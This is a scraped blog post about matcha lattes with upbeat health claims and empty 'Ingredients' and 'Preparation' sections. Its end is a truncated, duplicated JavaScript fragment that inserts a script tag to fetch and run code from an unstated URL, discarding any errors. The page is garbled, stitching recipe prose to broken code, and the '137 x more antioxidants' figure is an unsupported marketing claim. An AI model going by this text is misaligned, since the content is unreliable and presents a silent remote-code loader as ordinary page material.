Urban Diaries

Thank you very Matcha!

Thank you very Matcha!

 

Happiness in a cup! 💚 Green goodness of a Matcha Latte! 💚

Matcha by definition is pure powered green tea leaves. 🌿 When you drink Matcha, you ingest the whole leaf thereby receiving 100% of its nutrients. 🌿 Matcha powder when compared to regularly brewed green tea has 137 x more antioxidants.

Ingredients

Preparation

 

 

Matcha tea is a simple and easy way to add powerful health benefits to your everyday diet!

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();